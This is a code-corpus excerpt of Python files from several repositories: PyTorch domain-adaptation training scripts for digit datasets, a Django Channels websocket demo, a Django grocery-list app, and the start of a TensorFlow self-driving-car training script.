    num_iter = max(len_source, len_target)
    total_loss = 0
    for batch_idx in range(num_iter):
        if batch_idx % len_source == 0:
            iter_source = iter(train_loader)
        if batch_idx % len_target == 0:
            iter_target = iter(train_loader1)
        # Use the builtin next(); the .next() method is Python-2 style and
        # was removed from DataLoader iterators.
        data_source, label_source = next(iter_source)
        data_source, label_source = data_source.cuda(), label_source.cuda()
        data_target, label_target = next(iter_target)
        data_target = data_target.cuda()  # target labels stay unused (unsupervised)
        optimizer.zero_grad()
        optimizer_ad.zero_grad()
        feature_source, output_source = model(data_source)
        feature_target, output_target = model(data_target)
        feature = torch.cat((feature_source, feature_target), 0)
        output = torch.cat((output_source, output_target), 0)
        # Pseudo-labels for the target half: argmax over the softmax output.
        labels_target_fake = torch.max(nn.Softmax(dim=1)(output_target), 1)[1]
        labels = torch.cat((label_source, labels_target_fake))
        # Supervised loss on the source half of the concatenated batch only.
        loss = nn.CrossEntropyLoss()(output.narrow(0, 0, data_source.size(0)), label_source)
        softmax_output = nn.Softmax(dim=1)(output)
        if epoch > 0:
            entropy = loss_func.Entropy(softmax_output)
            loss += loss_func.CDAN([feature, softmax_output], ad_net, entropy,
                                   network.calc_coeff(num_iter * epoch + batch_idx), random_layer)
        mdd_loss = args.mdd_weight * loss_func.mdd_digit(feature, labels, args.left_weight, args.right_weight, args.weight)
        loss = loss + mdd_loss
        # .item() detaches the scalar; accumulating loss.data kept the whole
        # graph's tensors alive across the epoch.
        total_loss += loss.item()
        loss.backward()
        optimizer.step()
        if epoch > 0:
            optimizer_ad.step()
        if (batch_idx + epoch * num_iter) % args.log_interval == 0:
            print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
                epoch, batch_idx * args.batch_size, num_iter * args.batch_size,
                100. * batch_idx / num_iter, loss.item()))
    log_str = "total_loss:{}\n".format(total_loss)
    config["out_file"].write(log_str)
    config["out_file"].flush()
    print(log_str)
def test(epoch, config, model, test_loader):
    """Evaluate `model` on `test_loader`; log and return accuracy (percent)."""
    model.eval()
    test_loss = 0
    correct = 0
    # Inference only: disabling autograd avoids gradient bookkeeping and
    # reduces memory use during evaluation.
    with torch.no_grad():
        for data, target in test_loader:
            data, target = data.cuda(), target.cuda()
            feature, output = model(data)
            test_loss += nn.CrossEntropyLoss()(output, target).item()
            pred = output.data.cpu().max(1, keepdim=True)[1]
            correct += pred.eq(target.data.cpu().view_as(pred)).sum().item()
    test_loss /= len(test_loader.dataset)
    acc = 100. * correct / len(test_loader.dataset)
    log_str = 'epoch:{},Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\n'.format(epoch,
                                                                                            test_loss, correct,
                                                                                            len(test_loader.dataset),
                                                                                            acc)
    config["out_file"].write(log_str)
    config["out_file"].flush()
    print(log_str)
    return acc
def main():
    """Parse CLI options, seed RNGs, build the SVHN->MNIST loaders and DTN
    model, train with CDAN, and checkpoint the best model by test accuracy."""
    parser = argparse.ArgumentParser(description='CDAN SVHN MNIST')
    parser.add_argument('--method', type=str, default='CDAN-E', choices=['CDAN', 'CDAN-E', 'DANN'])
    parser.add_argument('--task', default='USPS2MNIST', help='task to perform')
    parser.add_argument('--batch_size', type=int, default=256,
                        help='input batch size for training (default: 256)')
    parser.add_argument('--test_batch_size', type=int, default=1000,
                        help='input batch size for testing (default: 1000)')
    parser.add_argument('--epochs', type=int, default=100, metavar='N',
                        help='number of epochs to train (default: 100)')
    parser.add_argument('--lr', type=float, default=0.03, metavar='LR')
    parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
                        help='SGD momentum (default: 0.5)')
    parser.add_argument('--gpu_id', default='0', type=str,
                        help='cuda device id')
    parser.add_argument('--seed', type=int, default=40, metavar='S',
                        help='random seed (default: 40)')
    parser.add_argument('--log_interval', type=int, default=10,
                        help='how many batches to wait before logging training status')
    parser.add_argument('--random', type=bool, default=False,
                        help='whether to use random')
    parser.add_argument("--mdd_weight", type=float, default=0)
    parser.add_argument("--entropic_weight", type=float, default=0)
    parser.add_argument("--weight", type=float, default=1)
    parser.add_argument("--left_weight", type=float, default=1)
    parser.add_argument("--right_weight", type=float, default=1)
    parser.add_argument('--use_seed', type=int, default=1)
    args = parser.parse_args()
    if args.use_seed:
        # Seed every RNG involved (numpy, torch CPU/GPU, python stdlib) and
        # force deterministic cuDNN for reproducible runs.
        import random
        np.random.seed(args.seed)
        torch.manual_seed(args.seed)
        torch.cuda.manual_seed(args.seed)
        torch.cuda.manual_seed_all(args.seed)
        random.seed(args.seed)
        torch.backends.cudnn.benchmark = False
        torch.backends.cudnn.deterministic = True
    import os.path as osp
    import time
    config = {}
    config["use_seed"] = args.use_seed
    config['seed'] = args.seed
    config["output_path"] = "snapshot/s2m"
    config["mdd_weight"] = args.mdd_weight
    config["entropic_weight"] = args.entropic_weight
    config["weight"] = args.weight
    config["left_weight"] = args.left_weight
    config["right_weight"] = args.right_weight
    # os.makedirs is portable and immune to shell quoting, unlike the
    # previous os.system('mkdir -p ...') call.
    os.makedirs(config["output_path"], exist_ok=True)
    config["out_file"] = open(osp.join(config["output_path"], "log_svhn_to_mnist_{}______{}.txt".
                                       format(str(int(time.time())), str(args.seed))),
                              "w")
    os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_id
    source_list = 'data/svhn2mnist/svhn_balanced.txt'
    target_list = 'data/svhn2mnist/mnist_train.txt'
    test_list = 'data/svhn2mnist/mnist_test.txt'
    train_loader = torch.utils.data.DataLoader(
        ImageList(open(source_list).readlines(), transform=transforms.Compose([
            transforms.ToTensor(),
            transforms.Normalize((0.5,), (0.5,))
        ]), mode='RGB'),
        batch_size=args.batch_size, shuffle=True, num_workers=0)
    train_loader1 = torch.utils.data.DataLoader(
        ImageList(open(target_list).readlines(), transform=transforms.Compose([
            transforms.Resize((32, 32)),
            transforms.ToTensor(),
            transforms.Normalize((0.5,), (0.5,))
        ]), mode='RGB'),
        batch_size=args.batch_size, shuffle=True, num_workers=0)
    test_loader = torch.utils.data.DataLoader(
        ImageList(open(test_list).readlines(), transform=transforms.Compose([
            transforms.Resize((32, 32)),
            transforms.ToTensor(),
            transforms.Normalize((0.5,), (0.5,))
        ]), mode='RGB'),
        batch_size=args.test_batch_size, shuffle=True, num_workers=0)
    model = network.DTN()
    model = model.cuda()
    class_num = 10
    if args.random:
        # Random multilinear map reduces the feature x prediction outer
        # product to a fixed 500-d input for the discriminator.
        random_layer = network.RandomLayer([model.output_num(), class_num], 500)
        ad_net = network.AdversarialNetwork(500, 500)
        random_layer.cuda()
    else:
        random_layer = None
        ad_net = network.AdversarialNetwork(model.output_num() * class_num, 500)
    ad_net = ad_net.cuda()
    optimizer = optim.SGD(model.parameters(), lr=args.lr, weight_decay=0.0005, momentum=0.9)
    optimizer_ad = optim.SGD(ad_net.parameters(), lr=args.lr, weight_decay=0.0005, momentum=0.9)
    config["out_file"].write(str(config))
    config["out_file"].flush()
    best_model = model
    best_acc = 0
    for epoch in range(1, args.epochs + 1):
        # Decay the classifier LR by 0.3 every 3 epochs.
        if epoch % 3 == 0:
            for param_group in optimizer.param_groups:
                param_group["lr"] = param_group["lr"] * 0.3
        train(args, config, model, ad_net, random_layer, train_loader, train_loader1, optimizer, optimizer_ad, epoch)
        acc = test(epoch, config, model, test_loader)
        if (acc > best_acc):
            best_model = model
            best_acc = acc
    # torch.save fails if the parent directory does not exist.
    os.makedirs("snapshot/s2m_model", exist_ok=True)
    torch.save(best_model, osp.join("snapshot/s2m_model", "s2m_{}_{}".format(str(best_acc), str(args.mdd_weight))))
if __name__ == '__main__':
    main()  # CLI entry point
--- FILE SEPARATOR ---
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from data_list import ImageList
import os
from torch.autograd import Variable
import loss as loss_func
import numpy as np
import network
def train(args, model, ad_net, random_layer, train_loader, train_loader1, optimizer, optimizer_ad, epoch, start_epoch,
          method):
    """Run one CDAN training epoch for the USPS<->MNIST task.

    Source batches carry labels; target batches are used unlabeled. The
    adversarial CDAN term kicks in after `start_epoch` warm-up epochs, and
    MDD / entropic-confusion penalties are always added. `method` is kept
    for interface compatibility but not consulted in this body.
    """
    model.train()
    len_source = len(train_loader)
    len_target = len(train_loader1)
    # Step for as many iterations as the longer loader; restart the shorter.
    num_iter = max(len_source, len_target)
    for batch_idx in range(num_iter):
        if batch_idx % len_source == 0:
            iter_source = iter(train_loader)
        if batch_idx % len_target == 0:
            iter_target = iter(train_loader1)
        # builtin next(): DataLoader iterators no longer expose .next().
        data_source, label_source = next(iter_source)
        data_source, label_source = data_source.cuda(), label_source.cuda()
        data_target, label_target = next(iter_target)
        data_target = data_target.cuda()  # target labels intentionally unused
        optimizer.zero_grad()
        optimizer_ad.zero_grad()
        feature_source, output_source = model(data_source)
        feature_target, output_target = model(data_target)
        feature = torch.cat((feature_source, feature_target), 0)
        output = torch.cat((output_source, output_target), 0)
        # Pseudo-labels for the target half via argmax of the softmax output.
        labels_target_fake = torch.max(nn.Softmax(dim=1)(output_target), 1)[1]
        labels = torch.cat((label_source, labels_target_fake))
        # Supervised cross-entropy on the source half only.
        loss = nn.CrossEntropyLoss()(output.narrow(0, 0, data_source.size(0)), label_source)
        softmax_output = nn.Softmax(dim=1)(output)
        if epoch > start_epoch:
            entropy = loss_func.Entropy(softmax_output)
            loss += loss_func.CDAN([feature, softmax_output], ad_net, entropy,
                                   network.calc_coeff(num_iter * (epoch - start_epoch) + batch_idx), random_layer)
        loss = loss + args.mdd_weight * loss_func.mdd_digit(
            feature, labels) + args.entropic_weight * loss_func.EntropicConfusion(feature)
        loss.backward()
        optimizer.step()
        if epoch > start_epoch:
            optimizer_ad.step()
        if (batch_idx + epoch * num_iter) % args.log_interval == 0:
            print('Train Epoch: {} [{}/{} ({:.4f}%)]\tLoss: {:.6f}'.format(
                epoch, batch_idx * args.batch_size, num_iter * args.batch_size,
                100. * batch_idx / num_iter, loss.item()))
def test(args, epoch, config, model, test_loader):
    """Evaluate `model` on `test_loader` and log loss/accuracy to the run log."""
    model.eval()
    test_loss = 0
    correct = 0
    # Inference only: disable autograd for speed and memory.
    with torch.no_grad():
        for data, target in test_loader:
            data, target = data.cuda(), target.cuda()
            feature, output = model(data)
            test_loss += nn.CrossEntropyLoss()(output, target).item()
            pred = output.data.cpu().max(1, keepdim=True)[1]
            correct += pred.eq(target.data.cpu().view_as(pred)).sum().item()
    test_loss /= len(test_loader.dataset)
    log_str = 'epoch:{} Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\n'.format(
        epoch, test_loss, correct, len(test_loader.dataset),
        100. * correct / len(test_loader.dataset))
    config["out_file"].write(log_str)
    config["out_file"].flush()
    print(log_str)
def main():
    """Parse options, build USPS<->MNIST loaders and the LeNet model, and
    run the CDAN training loop with per-`decay_epoch` LR halving."""
    # Training settings
    parser = argparse.ArgumentParser(description='CDAN USPS MNIST')
    parser.add_argument('--method', type=str, default='CDAN-E', choices=['CDAN', 'CDAN-E', 'DANN'])
    parser.add_argument('--task', default='MNIST2USPS', help='USPS2MNIST or MNIST2USPS')
    parser.add_argument('--batch_size', type=int, default=64,
                        help='input batch size for training (default: 64)')
    parser.add_argument('--test_batch_size', type=int, default=1000,
                        help='input batch size for testing (default: 1000)')
    parser.add_argument('--epochs', type=int, default=100, metavar='N',
                        help='number of epochs to train (default: 100)')
    parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
                        help='learning rate (default: 0.01)')
    parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
                        help='SGD momentum (default: 0.5)')
    parser.add_argument('--gpu_id', default='0', type=str,
                        help='cuda device id')
    parser.add_argument('--seed', type=int, default=1, metavar='S',
                        help='random seed (default: 1)')
    parser.add_argument('--log_interval', type=int, default=10,
                        help='how many batches to wait before logging training status')
    parser.add_argument('--random', type=bool, default=False,
                        help='whether to use random')
    parser.add_argument('--mdd_weight', type=float, default=0.05)
    parser.add_argument('--entropic_weight', type=float, default=0)
    parser.add_argument("--use_seed", type=bool, default=True)
    args = parser.parse_args()
    import random
    if (args.use_seed):
        # Seed all RNGs (torch, numpy, python) and force deterministic cuDNN.
        torch.manual_seed(args.seed)
        np.random.seed(args.seed)
        random.seed(args.seed)
        torch.backends.cudnn.deterministic = True
    import os.path as osp
    import datetime
    config = {}
    config["output_path"] = "snapshot/" + args.task
    config['seed'] = args.seed
    config["torch_seed"] = torch.initial_seed()
    config["torch_cuda_seed"] = torch.cuda.initial_seed()
    config["mdd_weight"] = args.mdd_weight
    config["entropic_weight"] = args.entropic_weight
    # os.makedirs replaces the shell-dependent os.system('mkdir -p ...').
    os.makedirs(config["output_path"], exist_ok=True)
    config["out_file"] = open(osp.join(config["output_path"], "log_{}_{}.txt".
                                      format(args.task, str(datetime.datetime.utcnow()))),
                              "w")
    # Note: the original seeded torch a second time here unconditionally,
    # which defeated the --use_seed switch; seeding now happens only above.
    os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_id
    if args.task == 'USPS2MNIST':
        source_list = 'data/usps2mnist/usps_train.txt'
        target_list = 'data/usps2mnist/mnist_train.txt'
        test_list = 'data/usps2mnist/mnist_test.txt'
        start_epoch = 1
        decay_epoch = 6
    elif args.task == 'MNIST2USPS':
        source_list = 'data/usps2mnist/mnist_train.txt'
        target_list = 'data/usps2mnist/usps_train.txt'
        test_list = 'data/usps2mnist/usps_test.txt'
        start_epoch = 1
        decay_epoch = 5
    else:
        raise Exception('task cannot be recognized!')
    train_loader = torch.utils.data.DataLoader(
        ImageList(open(source_list).readlines(), transform=transforms.Compose([
            transforms.Resize((28, 28)),
            transforms.ToTensor(),
            transforms.Normalize((0.5,), (0.5,))
        ]), mode='L'),
        batch_size=args.batch_size, shuffle=True, num_workers=1, drop_last=True)
    train_loader1 = torch.utils.data.DataLoader(
        ImageList(open(target_list).readlines(), transform=transforms.Compose([
            transforms.Resize((28, 28)),
            transforms.ToTensor(),
            transforms.Normalize((0.5,), (0.5,))
        ]), mode='L'),
        batch_size=args.batch_size, shuffle=True, num_workers=1, drop_last=True)
    test_loader = torch.utils.data.DataLoader(
        ImageList(open(test_list).readlines(), transform=transforms.Compose([
            transforms.Resize((28, 28)),
            transforms.ToTensor(),
            transforms.Normalize((0.5,), (0.5,))
        ]), mode='L'),
        batch_size=args.test_batch_size, shuffle=True, num_workers=1)
    model = network.LeNet()
    model = model.cuda()
    class_num = 10
    if args.random:
        # Random multilinear map -> fixed 500-d discriminator input.
        random_layer = network.RandomLayer([model.output_num(), class_num], 500)
        ad_net = network.AdversarialNetwork(500, 500)
        random_layer.cuda()
    else:
        random_layer = None
        ad_net = network.AdversarialNetwork(model.output_num() * class_num, 500)
    ad_net = ad_net.cuda()
    optimizer = optim.SGD(model.parameters(), lr=args.lr, weight_decay=0.0005, momentum=0.9)
    optimizer_ad = optim.SGD(ad_net.parameters(), lr=args.lr, weight_decay=0.0005, momentum=0.9)
    config["out_file"].write(str(config) + "\n")
    config["out_file"].flush()
    for epoch in range(1, args.epochs + 1):
        # Halve the classifier LR every decay_epoch epochs.
        if epoch % decay_epoch == 0:
            for param_group in optimizer.param_groups:
                param_group["lr"] = param_group["lr"] * 0.5
        train(args, model, ad_net, random_layer, train_loader, train_loader1, optimizer, optimizer_ad, epoch,
              start_epoch, args.method)
        test(args, epoch, config, model, test_loader)
if __name__ == '__main__':
    main()  # CLI entry point
--- FILE SEPARATOR ---
import torch
import torch.nn as nn
import data.pre_process as prep
from torch.utils.data import DataLoader
from data.data_list import ImageList
def image_classification_test(loader, model, test_10crop=True):
    """Compute the classification accuracy of `model` on loader['test'].

    With test_10crop=True, loader['test'] is a list of 10 loaders (one per
    crop); the softmax outputs of the 10 crops are summed before argmax.
    Returns accuracy as a float in [0, 1].
    """
    start_test = True
    with torch.no_grad():
        if test_10crop:
            iter_test = [iter(loader['test'][i]) for i in range(10)]
            for i in range(len(loader['test'][0])):
                # One batch from every crop loader; the labels are the same
                # across crops, so take them from crop 0.
                data = [next(iter_test[j]) for j in range(10)]
                inputs = [batch[0].cuda() for batch in data]
                labels = data[0][1]
                outputs = []
                for j in range(10):
                    _, predict_out = model(inputs[j])
                    outputs.append(nn.Softmax(dim=1)(predict_out))
                outputs = sum(outputs)
                if start_test:
                    all_output = outputs.float().cpu()
                    all_label = labels.float()
                    start_test = False
                else:
                    all_output = torch.cat((all_output, outputs.float().cpu()), 0)
                    all_label = torch.cat((all_label, labels.float()), 0)
        else:
            iter_test = iter(loader["test"])
            for i in range(len(loader['test'])):
                inputs, labels = next(iter_test)
                inputs = inputs.cuda()
                _, outputs = model(inputs)
                if start_test:
                    # Keep labels on CPU: the original moved them to GPU
                    # while outputs were collected on CPU, so the final
                    # comparison crossed devices.
                    all_output = outputs.float().cpu()
                    all_label = labels.float()
                    start_test = False
                else:
                    all_output = torch.cat((all_output, outputs.float().cpu()), 0)
                    all_label = torch.cat((all_label, labels.float()), 0)
    _, predict = torch.max(all_output, 1)
    accuracy = torch.sum(torch.squeeze(predict).float() == all_label).item() / float(all_label.size()[0])
    return accuracy
# Standalone evaluation: 10-crop test of a saved Office model (dslr->amazon)
# on the amazon image list.
prep_dict = {}
prep_config = {"test_10crop": True, 'params': {"resize_size": 256, "crop_size": 224, 'alexnet': False}}
prep_dict["target"] = prep.image_train(**prep_config['params'])
if prep_config["test_10crop"]:
    prep_dict["test"] = prep.image_test_10crop(**prep_config['params'])
else:
    prep_dict["test"] = prep.image_test(**prep_config['params'])
dsets = {}
dset_loaders = {}
model_path = "model/d2a_74.298.pth"
test_path = 'data/amazon_list.txt'
if prep_config["test_10crop"]:
    # One dataset/loader per crop transform. (The original wrapped this in
    # an extra `for i in range(10)` loop that rebuilt the same list 10x.)
    dsets["test"] = [ImageList(open(test_path).readlines(),
                              transform=prep_dict["test"][i]) for i in range(10)]
    dset_loaders["test"] = [DataLoader(dset, batch_size=4,
                                       shuffle=False, num_workers=0) for dset in dsets['test']]
else:
    dsets["test"] = ImageList(open(test_path).readlines(),
                              transform=prep_dict["test"])
    dset_loaders["test"] = DataLoader(dsets["test"], batch_size=4,
                                      shuffle=False, num_workers=0)
model = torch.load(model_path)  # NOTE(review): unpickles a full model; trusted checkpoints only
model.eval()
print(image_classification_test(dset_loaders, model))
--- FILE SEPARATOR ---
import torch
import torch.nn as nn
from torchvision import transforms
from data.data_list import ImageList
def test(model, test_loader):
    """Return `model`'s accuracy (percent) on `test_loader`."""
    model.eval()
    test_loss = 0
    correct = 0
    # Inference only: no gradients needed.
    with torch.no_grad():
        for data, target in test_loader:
            data, target = data.cuda(), target.cuda()
            feature, output = model(data)
            test_loss += nn.CrossEntropyLoss()(output, target).item()
            pred = output.data.cpu().max(1, keepdim=True)[1]
            correct += pred.eq(target.data.cpu().view_as(pred)).sum().item()
    test_loss /= len(test_loader.dataset)
    acc = 100. * correct / len(test_loader.dataset)
    return acc
# Standalone evaluation of a saved SVHN->MNIST model on the MNIST test list.
test_list = 'data/mnist_test.txt'
model = torch.load('model/s2m_94.84.pth')  # NOTE(review): unpickles a full model; trusted checkpoints only
test_loader = torch.utils.data.DataLoader(
    ImageList(open(test_list).readlines(), transform=transforms.Compose([
        transforms.Resize((32,32)),
        transforms.ToTensor(),
        transforms.Normalize((0.5,), (0.5,))
    ]), mode='RGB'),
    batch_size=1000, shuffle=True, num_workers=1)
acc = test(model, test_loader)
print(acc)
|
[
"/loss.py",
"/train_image.py",
"/train_svhnmnist.py",
"/train_uspsmnist.py",
"/validate_d2a.py",
"/validate_s2m.py"
] |
02ChenBo/websocket
|
from channels.generic.websocket import WebsocketConsumer
import json
import threading
import time
cancel_tmr = False
class ChatConsumer(WebsocketConsumer):
    """Echo consumer that also pushes a timestamp heartbeat every 3 seconds."""

    # Called when the websocket handshake arrives.
    def connect(self):
        self._closed = False
        self.accept()
        self.heart_beat()
        print('connect----')

    # Called when the client disconnects.
    def disconnect(self, close_code):
        # Stop the heartbeat; otherwise the Timer re-arms forever and keeps
        # trying to send on a closed socket.
        self._closed = True
        print('disconnect----')

    # Called when a message is received; echoes it back to the client.
    def receive(self, text_data):
        text_data_json = json.loads(text_data)
        message = text_data_json['message']
        self.send(text_data=json.dumps({
            'message': message
        }))

    def heart_beat(self):
        # Send the current timestamp, then re-arm a 3-second timer while the
        # connection (and the module-level cancel switch) allow it.
        if getattr(self, '_closed', False):
            return
        date = time.strftime('%Y-%m-%d %H:%M:%S')
        self.send(text_data=json.dumps({
            'message': date
        }))
        if not cancel_tmr and not self._closed:
            threading.Timer(3, self.heart_beat).start()
--- FILE SEPARATOR ---
from django.conf.urls import url
from .views import Controller
# URL routes for the chat app: the index page and per-room pages.
urlpatterns = [
    url(r'^$', Controller.index, name='index'),
    url(r'^(?P<room_name>[^/]+)/$', Controller.room, name='room'),
]
--- FILE SEPARATOR ---
from django.shortcuts import render
# Create your views here.
import datetime
from django.http import HttpResponse
# from dao.dbutils import mySql
from django.utils.safestring import mark_safe
import json
class Controller():
    """View functions grouped on a class and routed as plain attributes
    (urls.py uses Controller.index / Controller.room), hence no `self`:
    declared as staticmethods to make that explicit."""

    @staticmethod
    def index(request):
        """Render the chat index page."""
        return render(request, 'index.html', {})

    @staticmethod
    def room(request, room_name):
        """Render a chat room; the room name is passed to the template as JSON."""
        return render(request, 'room.html', {
            'room_name_json': mark_safe(json.dumps(room_name))
        })

    @staticmethod
    def hello(request):
        """Sanity-check view: greeting plus the current server time."""
        s1 = 'Hello World!'
        time = datetime.datetime.now()
        html = '<html><head></head><body><h1> %s </h1><p> %s </p></body></html>' % (s1, time)
        return HttpResponse(html)

    # def login(request):
    #     str = 'SELECT VERSION()'
    #     version = mySql(str)
    #     ss = "Database version : %s " % version
    #     s1 = 'Welcome!'
    #     html = '<html><head></head><body align=\'center\'><h1>' + s1 + ' </h1><p>Database version: ' + ss + '</p></body></html>'
    #     return HttpResponse(html)
--- FILE SEPARATOR ---
from channels.routing import ProtocolTypeRouter,URLRouter
from channels.auth import AuthMiddlewareStack
import Hello.routing
# ASGI entry point: websocket connections go through Django's auth
# middleware into the Hello app's URL router; HTTP falls back to the
# default Django application.
application = ProtocolTypeRouter({
    'websocket': AuthMiddlewareStack(
        URLRouter(
            Hello.routing.websocket_urlpatterns
        )
    ),
})
--- FILE SEPARATOR ---
#import pymysql
#
# connect = pymysql.Connect(
# host='localhost',
# port=3306,
# user='root',
# passwd='',
# db='cloud_note',
# charset='utf8'
# )
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# import MySQLdb
# def mySql(ss):
# # 打开数据库连接
# db = MySQLdb.connect("localhost","root","","cloud_note")
#
# # 使用cursor()方法获取操作游标
# cursor = db.cursor()
#
# # 使用execute方法执行SQL语句
# cursor.execute(ss)
#
# # 使用 fetchone() 方法获取一条数据库。
# data = cursor.fetchone()
#
# #print ("Database version : %s " % data)
#
# # 关闭数据库连接
# db.close()
# return data;
#
# ss = "SELECT VERSION()";
# str = mySql(ss);
# print(str);
|
[
"/Hello/consumers.py",
"/Hello/urls.py",
"/Hello/views.py",
"/HelloDjango/routing.py",
"/dao/dbutils.py"
] |
02GAURAVTRIPATHI/GroceryBag
|
from django.contrib import admin
from .models import ListModel
# Register your models here.
admin.site.register(ListModel)  # expose the grocery-list model in the Django admin
--- FILE SEPARATOR ---
# Generated by Django 3.1.3 on 2021-07-25 15:48
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds the optional `created_at` timestamp to
    # ListModel. Generated migrations should not be edited by hand.
    dependencies = [
        ('testapp', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='listmodel',
            name='created_at',
            field=models.DateTimeField(blank=True, null=True),
        ),
    ]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
from django.utils.translation import gettext_lazy as _
# Create your models here.
class ListModel(models.Model):
    """A single grocery-list entry owned by a user."""
    # NOTE(review): named user_id but holds a User FK (DB column user_id_id).
    user_id = models.ForeignKey(User, related_name="user_list", on_delete=models.CASCADE)
    item_name = models.CharField(max_length=800)
    quantity = models.CharField(max_length=300)
    class Status(models.TextChoices):
        # stored value, human-readable label
        BOUGHT = 'BOUGHT', _('item_bought')
        NOT_AVAILABLE = 'NOT AVAILABLE', _('item_end')
        PENDING = 'PENDING', _('in_queue')
    action = models.CharField(max_length=20, choices=Status.choices)
    # Optional entry/purchase date, parsed from the form in the views.
    created_at = models.DateTimeField(blank=True, null=True)
--- FILE SEPARATOR ---
from django.shortcuts import render
from .models import ListModel
from dateutil.parser import parse
# Create your views here.
def home_page_view(request):
    """Add a new grocery item for the logged-in user, then render the add form."""
    if request.method == "POST":
        data = request.POST.dict()  # read the form payload once instead of per-field
        item = data['item']
        quantity = data['quantity']
        status = data['status']
        # dateutil's parse accepts flexible human-entered date formats.
        date = parse(data['date'])
        ListModel.objects.create(user_id=request.user, item_name=item, quantity=quantity, action=status, created_at=date)
    return render(request, 'testapp/HTML/add.html')
def home1_page_view(request):
    """List the user's items, optionally filtered by an exact created_at date."""
    items = ListModel.objects.filter(user_id=request.user)
    if request.method == "POST":
        raw_date = request.POST.dict().get('filter')
        if raw_date:
            items = ListModel.objects.filter(user_id=request.user, created_at=parse(raw_date))
    return render(request, 'testapp/HTML/index.html', {'items': items})
def home2_page_view(request, id):
    """Update item `id` from the submitted form, then render the edit page."""
    if request.method == "POST":
        data = request.POST.dict()  # read the form payload once
        ListModel.objects.filter(id=id).update(
            item_name=data['item'],
            quantity=data['quantity'],
            action=data['status'],
            created_at=parse(data['date']),
        )
    item = ListModel.objects.get(id=id)
    return render(request, 'testapp/HTML/update.html', {'item': item})
from django.shortcuts import redirect
from .forms import NewUserForm
from django.contrib.auth import login
from django.contrib import messages
def register_request(request):
    """Register a new user; log them in and redirect on success.

    On an invalid POST the *bound* form is re-rendered so field errors are
    shown (previously a fresh empty form discarded them), and the error
    message is flashed only for failed submissions, not plain GETs.
    """
    if request.method == "POST":
        form = NewUserForm(request.POST)
        if form.is_valid():
            user = form.save()
            login(request, user)
            messages.success(request, "Registration successful." )
            return redirect("/accounts/login")
        messages.error(request, "Unsuccessful registration. Invalid information.")
    else:
        form = NewUserForm()
    return render (request=request, template_name="testapp/HTML/register.html", context={"register_form":form})
|
[
"/templateproject1/testapp/admin.py",
"/templateproject1/testapp/migrations/0002_listmodel_created_at.py",
"/templateproject1/testapp/models.py",
"/templateproject1/testapp/views.py"
] |
02alexander/autocar
|
#!/usr/bin/env python3
import numpy as np
import tensorflow as tf
import cv2
import os
import termios, sys
from tensorflow.keras.layers import Dense, Conv2D, Flatten
from recorder import Recorder
import argparse
from tensorflow.keras.utils import to_categorical
from trainer import proc_img, get_model
def train_single_output(x, y, x_test=None, y_test=None, epochs=300, reg=0.0):
    """Build and fit a small 20-20-1 regression net with L1 regularization.

    Returns (model, history); validates on (x_test, y_test) when both are
    provided, otherwise trains without a validation set.
    """
    penalty = tf.keras.regularizers.l1(reg)
    model = tf.keras.Sequential([
        tf.keras.layers.Dense(20, activation=tf.nn.sigmoid, kernel_regularizer=penalty),
        tf.keras.layers.Dense(20, activation=tf.nn.sigmoid, kernel_regularizer=penalty),
        tf.keras.layers.Dense(1, activation=tf.nn.relu),
    ])
    model.compile(tf.keras.optimizers.Adam(),
                  loss=tf.keras.losses.MeanAbsoluteError(),
                  metrics=['mean_absolute_error'])
    has_validation = x_test is not None and y_test is not None
    if has_validation:
        history = model.fit(x, y, epochs=epochs, validation_data=(x_test, y_test))
    else:
        history = model.fit(x, y, epochs=epochs)
    return (model, history)
def train_models(x, y, epochs, regs):
    """Train one single-output model per regularization strength in `regs`
    and return the models in the same order."""
    return [train_single_output(x, y, epochs=epochs, reg=strength)[0]
            for strength in regs]
def train_15_outputs(model, x, y, x_test=None, y_test=None, reg=0.0, epochs=300):
    """Fit a 50-50-15 classifier with L2 regularization and return its History.

    NOTE(review): the `model` argument is immediately shadowed by a freshly
    built Sequential, so the passed-in model is ignored, and the trained
    model itself is never returned (only the fit History) — confirm intended.
    """
    model = tf.keras.Sequential([
        tf.keras.layers.Dense(50, activation=tf.nn.sigmoid, kernel_regularizer=tf.keras.regularizers.l2(reg)),
        tf.keras.layers.Dense(50, activation=tf.nn.sigmoid, kernel_regularizer=tf.keras.regularizers.l2(reg)),
        tf.keras.layers.Dense(15, activation=tf.nn.sigmoid)
    ])
    model.compile('adam',
                  loss='sparse_categorical_crossentropy',
                  metrics=['accuracy'])
    if x_test is not None and y_test is not None:
        return model.fit(x, y, epochs=epochs, validation_data=(x_test, y_test))
    else:
        return model.fit(x, y, epochs=epochs)
def train_bounded_output(x, y):
    """Fit a 120-50-1 network with SGD + MSE for 300 epochs and return it."""
    net = tf.keras.Sequential([
        tf.keras.layers.Dense(120, activation=tf.nn.sigmoid),
        tf.keras.layers.Dense(50, activation=tf.nn.sigmoid),
        tf.keras.layers.Dense(1, activation=tf.nn.relu),
    ])
    net.compile('sgd',
                loss=tf.keras.losses.MeanSquaredError(),
                metrics=['accuracy'])
    net.fit(x, y, batch_size=700, epochs=300)
    return net
def feature_scaling(row):
    """Min-max scale `row` into [0, 1].

    Returns an all-zero array when the row is constant; the original
    divided by zero there and produced NaN/inf. Local names avoid shadowing
    the builtins min/max.
    """
    lo = np.min(row)
    hi = np.max(row)
    span = hi - lo
    if span == 0:
        return np.zeros_like(np.asarray(row, dtype=float))
    return (row - lo) / span
def train():
    """Build a small conv classifier for recorded driving images.

    NOTE(review): `load_imgs` is neither defined nor imported in this file
    (only proc_img/get_model come from trainer), so calling this raises
    NameError — confirm where it should come from. The model is built and
    compiled but never fit; this function appears to be dead/WIP code (its
    only call site in main() is commented out).
    """
    (x,y) = load_imgs("/home/alexander/data/autocar-round-5,6")
    print(np.shape(x))
